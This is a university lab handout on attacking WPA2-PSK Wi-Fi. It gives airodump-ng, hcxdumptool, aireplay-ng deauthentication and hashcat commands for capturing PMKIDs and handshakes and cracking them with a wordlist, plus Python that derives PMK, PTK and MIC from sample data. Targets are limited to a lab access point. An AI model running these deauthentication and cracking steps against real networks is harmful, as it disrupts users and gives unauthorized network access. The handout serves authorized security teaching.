
WIR-101 Lab 4 — WPA2-PSK: Handshake Capture and Dictionary Attack


Prerequisites: Week 4 lecture; hcxdumptool + hashcat installed; GPU acceleration verified with hashcat -I
Duration: ~90 min
Points: 100


Authorization

  • Lab Authorization Form signed
  • Capture targets: VCA-WIR101-LAB (WPA2-PSK) only
  • Deauthentication is authorized against the lab AP's connected clients only
  • No production APs visible in your survey may be targeted

Objective

Capture a WPA2-PSK 4-way handshake using deauthentication injection, attempt a PMKID capture, and run a dictionary attack with hashcat. Understand the key derivation chain from passphrase to MIC.


Part A — Pre-Capture Survey (10 min)

sudo airmon-ng check kill
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon

Identify VCA-WIR101-LAB and any connected client stations (STA column in airodump-ng output). Record:

  • AP BSSID: ___
  • AP SSID: VCA-WIR101-LAB
  • Channel: ___
  • A connected client MAC (at least one should be visible in the STATION section): ___

Lock to the channel:

sudo airodump-ng -c CHANNEL --bssid AP_BSSID -w wpa2_capture --output-format pcap wlan0mon

Deliverable A

Screenshot of airodump-ng showing the AP and at least one connected client.


Part B — PMKID Capture (20 min)

PMKID capture does not require a connected client. It requests an association from the AP and extracts the PMKID from Message 1 of the EAPOL exchange.

sudo hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --enable_status=1

Wait 2-3 minutes. The --enable_status=1 flag prints a one-line status every second; look for lines showing PMKID captures. Press Ctrl+C when you have at least one PMKID.

Extract to hashcat format:

hcxpcapngtool -o hash_pmkid.22000 pmkid_capture.pcapng

Check the output:

wc -l hash_pmkid.22000
head -2 hash_pmkid.22000

The format is: hash_type*PMKID*AP_MAC*STA_MAC*ESSID_hex
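To see what those fields mean rather than just counting lines, the following Python (an added example, not part of the lab handout or the hcxtools project) parses one 22000 line using hashcat's full nine-field layout (WPA*TYPE*PMKID-or-MIC*MAC_AP*MAC_STA*ESSID_hex*ANONCE*EAPOL*MESSAGEPAIR; a PMKID line has type 01 and leaves the last three fields empty) and recomputes the PMKID from a candidate passphrase. The sample line is constructed inside the block from a made-up passphrase and locally administered MAC addresses, not taken from the lab AP; the class and function names are mine. It shows why no client is needed for this attack: the PMKID is just HMAC-SHA1(PMK, "PMK Name" || AP MAC || STA MAC), so anything that can obtain Message 1 holds a value that can be checked offline against the PMK derived from the SSID and a passphrase guess.

```python
import hashlib
import hmac
from dataclasses import dataclass


@dataclass
class Hash22000:
    """One line of hashcat's 22000 format (hypothetical helper class, not a hashcat API)."""
    kind: str        # "01" = PMKID line, "02" = EAPOL/MIC line
    digest: bytes    # 16-byte PMKID (type 01) or 16-byte MIC (type 02)
    ap_mac: bytes    # 6 bytes
    sta_mac: bytes   # 6 bytes
    essid: bytes     # raw ESSID bytes (the line carries it hex-encoded)


def parse_22000(line: str) -> Hash22000:
    """Split WPA*TYPE*PMKID/MIC*MAC_AP*MAC_STA*ESSID*ANONCE*EAPOL*MESSAGEPAIR into its parts."""
    fields = line.strip().split("*")
    if len(fields) != 9 or fields[0] != "WPA":
        raise ValueError("not a hashcat 22000 line")
    return Hash22000(
        kind=fields[1],
        digest=bytes.fromhex(fields[2]),
        ap_mac=bytes.fromhex(fields[3]),
        sta_mac=bytes.fromhex(fields[4]),
        essid=bytes.fromhex(fields[5]),
    )


def derive_pmk(passphrase: bytes, essid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt, 4096 iterations, 32 bytes), as in Part E."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, essid, 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1(PMK, "PMK Name" || AA || SPA) truncated to 128 bits (IEEE 802.11)."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def pmkid_matches(line: str, candidate: bytes) -> bool:
    """True if `candidate` is the passphrase behind the PMKID on this type-01 line."""
    h = parse_22000(line)
    if h.kind != "01":
        raise ValueError("expected a PMKID (type 01) line")
    pmkid = derive_pmkid(derive_pmk(candidate, h.essid), h.ap_mac, h.sta_mac)
    return hmac.compare_digest(pmkid, h.digest)


# ---- constructed sample data (made up for this example, not captured from the lab AP) ----
SAMPLE_PASSPHRASE = b"lab4-sample-passphrase"
SAMPLE_ESSID = b"VCA-WIR101-LAB"
SAMPLE_AP_MAC = bytes.fromhex("02000000aa01")   # locally administered, fictitious
SAMPLE_STA_MAC = bytes.fromhex("02000000cc02")  # locally administered, fictitious


def build_sample_line() -> str:
    """Assemble a type-01 line whose PMKID field really corresponds to SAMPLE_PASSPHRASE."""
    pmkid = derive_pmkid(derive_pmk(SAMPLE_PASSPHRASE, SAMPLE_ESSID),
                         SAMPLE_AP_MAC, SAMPLE_STA_MAC)
    return "*".join(["WPA", "01", pmkid.hex(), SAMPLE_AP_MAC.hex(),
                     SAMPLE_STA_MAC.hex(), SAMPLE_ESSID.hex(), "", "", ""])


if __name__ == "__main__":
    line = build_sample_line()
    print(line)
    h = parse_22000(line)
    print("ESSID decoded from hex field:", h.essid.decode())
    print("correct passphrase matches:", pmkid_matches(line, SAMPLE_PASSPHRASE))
    print("wrong passphrase matches:  ", pmkid_matches(line, b"not-the-passphrase"))
```

Run it on your real hash_pmkid.22000 line by passing that line and the passphrase hashcat recovered in Part D to pmkid_matches; a True result confirms the recovered passphrase explains the captured PMKID.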

Deliverable B

Screenshot of hcxdumptool output showing at least one PMKID captured + the first line of hash_pmkid.22000.


Part C — 4-Way Handshake Capture via Deauthentication (20 min)

While airodump-ng is still running in one terminal, send a targeted deauthentication to force the client to re-authenticate:

sudo aireplay-ng -0 1 -a AP_BSSID -c CLIENT_MAC wlan0mon

Watch the airodump-ng output for the WPA handshake: AP_BSSID message in the top-right corner. This confirms a 4-way handshake was captured.

If no handshake appears within 30 seconds, send another deauth (-0 1 = 1 deauth frame). If it still doesn't appear after 3 attempts, check that the client is actually connected and in range.

Extract the handshake:

hcxpcapngtool -o hash_eapol.22000 wpa2_capture-01.cap
wc -l hash_eapol.22000

You can also verify in Wireshark:

filter: eapol

You should see 4 EAPOL frames in sequence (Message 1, 2, 3, 4).

Deliverable C

Screenshot of airodump-ng showing WPA handshake: BSSID message + Wireshark screenshot showing the 4 EAPOL frames.


Part D — Dictionary Attack with hashcat (25 min)

The lab AP is pre-configured with a passphrase that exists in the provided wordlist lab4_wordlist.txt (10,000 entries, downloadable from the course portal).

Attack the PMKID hash first (faster verification if it finds a match):

hashcat -m 22000 hash_pmkid.22000 lab4_wordlist.txt

If the PMKID attack succeeds, record the passphrase. Then verify that the EAPOL handshake hash recovers the same passphrase:

hashcat -m 22000 hash_eapol.22000 lab4_wordlist.txt

If the PMKID attack failed (e.g., the AP did not include a PMKID in EAPOL Message 1), use the EAPOL hash only.

Run a second attack with rules (demonstrates how rule-based mutations extend wordlists):

hashcat -m 22000 hash_eapol.22000 lab4_wordlist.txt -r /usr/share/hashcat/rules/best64.rule

Record for each attempt: hash type, wordlist, rule file (if any), result (cracked/not found), time taken.

Deliverable D

hashcat output showing the cracked passphrase for both PMKID and EAPOL hashes + a summary table (hash type, wordlist, result, time).


Part E — PMK Derivation Verification (10 min)

Verify your understanding of the key derivation using Python:

import hashlib, binascii

passphrase = b"CRACKED_PASSPHRASE_HERE"  # fill in what you found
ssid = b"VCA-WIR101-LAB"

# PMK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt, 4096 iterations, 32-byte output)
pmk = hashlib.pbkdf2_hmac('sha1', passphrase, ssid, 4096, 32)
print("PMK:", binascii.hexlify(pmk).decode())

Compare your PMK to what hashcat reports in the --show output (if it includes the PMK in verbose mode: hashcat -m 22000 --show hash_eapol.22000).
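The objective of this lab is the whole chain from passphrase to MIC, and the snippet above stops at the PMK. The following Python (an added example, not part of the handout) carries the chain through: PMK via PBKDF2, PTK via the 802.11 PRF-512 keyed with the PMK over both MACs and both nonces, the KCK/KEK/TK split, and the HMAC-SHA1-128 MIC over an EAPOL-Key frame with its MIC field zeroed. The MACs, nonces and EAPOL Message 2 are constructed inside the block (not from your capture) and every function name is mine. It also checks the PBKDF2 step against the IEEE 802.11 test vector (passphrase "password", SSID "IEEE") and shows that the same passphrase yields a different PMK for a different SSID, which is the point behind write-up question 3.

```python
import hashlib
import hmac


def derive_pmk(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID as salt, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion",
                     min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)


def split_ptk(ptk: bytes):
    """KCK (signs EAPOL frames), KEK (wraps the GTK in Message 3), TK (CCMP data key)."""
    return ptk[0:16], ptk[16:32], ptk[32:48]


MIC_OFFSET = 81  # 4-byte EAPOL header + descriptor fields up to and including Key ID


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """WPA2 MIC = HMAC-SHA1(KCK, EAPOL-Key frame with its 16-byte MIC field zeroed)[:16]."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce: bytes, key_data: bytes = b"") -> bytes:
    """Constructed EAPOL-Key Message 2 (802.1X v2, RSN descriptor) with an all-zero MIC field."""
    body = (b"\x02"                      # descriptor type: RSN
            + b"\x01\x0a"                # key info: MIC set, pairwise, descriptor version 2
            + b"\x00\x10"                # key length 16 (CCMP)
            + (1).to_bytes(8, "big")     # replay counter
            + snonce                     # key nonce = SNonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # key IV, RSC, key ID (unused in M2)
            + b"\x00" * 16               # MIC placeholder
            + len(key_data).to_bytes(2, "big") + key_data)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def mic_for(passphrase: bytes, ssid: bytes, ap_mac: bytes, sta_mac: bytes,
            anonce: bytes, snonce: bytes, frame: bytes) -> bytes:
    """Run the whole chain for one passphrase and return the MIC it predicts for `frame`."""
    ptk = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    kck, _, _ = split_ptk(ptk)
    return eapol_mic(kck, frame)


# ---- constructed sample data (fictitious, not from the lab capture) ----
SSID = b"VCA-WIR101-LAB"
AP_MAC = bytes.fromhex("02000000aa01")
STA_MAC = bytes.fromhex("02000000cc02")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
IEEE_VECTOR_PMK = "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e"


def pbkdf2_matches_ieee_vector() -> bool:
    """Sanity check of the PMK step against the IEEE 802.11 Annex test vector."""
    return derive_pmk(b"password", b"IEEE").hex() == IEEE_VECTOR_PMK


if __name__ == "__main__":
    print("PBKDF2 matches IEEE vector:", pbkdf2_matches_ieee_vector())
    print("same passphrase, other SSID gives other PMK:",
          derive_pmk(b"sample", SSID) != derive_pmk(b"sample", b"home-network"))
    frame = build_eapol_msg2(SNONCE)
    print("MIC for 'sample':", mic_for(b"sample", SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, frame).hex())
```

Replace "sample" with the passphrase you recovered and the MACs and nonces with the ones from your own capture (ANonce from Message 1, SNonce from Message 2) and the MIC you compute must equal the MIC field of your captured Message 2; that equality is exactly what hashcat tests once per wordlist entry, and the 4096 PBKDF2 iterations in derive_pmk are where almost all of that per-guess cost goes.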

Deliverable E

The Python PMK output.


Write-up Questions

  1. What is the functional difference between the PMKID attack and the 4-way handshake attack? Which is more dangerous to network defenders, and why?
  2. The lab wordlist has 10,000 entries. At your GPU speed (from hashcat -I), how long would it take to exhaust rockyou.txt (~14 million entries) against a single WPA2-PSK hash?
  3. The lab AP SSID is "VCA-WIR101-LAB." If you computed a rainbow table for SSID "home-network," would those precomputed PMKs work against this AP? Why or why not?
  4. A user changes their WPA2-PSK passphrase from "password123" to a 25-character random string. What specific aspect of PBKDF2 makes GPU attacks against the new passphrase impractical (even if the hash is captured)?

Cleanup

sudo airmon-ng stop wlan0mon
sudo systemctl restart NetworkManager

Virtual Path

The virtual path provides:

  • hash_pmkid_lab4.22000: a pre-extracted PMKID hash from the lab AP
  • hash_eapol_lab4.22000: a pre-extracted EAPOL handshake hash
  • lab4_wordlist.txt: the wordlist

Complete Parts D and E only. For Parts B and C, study the provided Wireshark screenshot of the EAPOL sequence and answer the write-up questions based on the provided data.


Submission

Zip into lab4_YOURNAME.zip:

  • deliverable_A.png through deliverable_E.txt
  • pmk_verify.py
  • writeup.md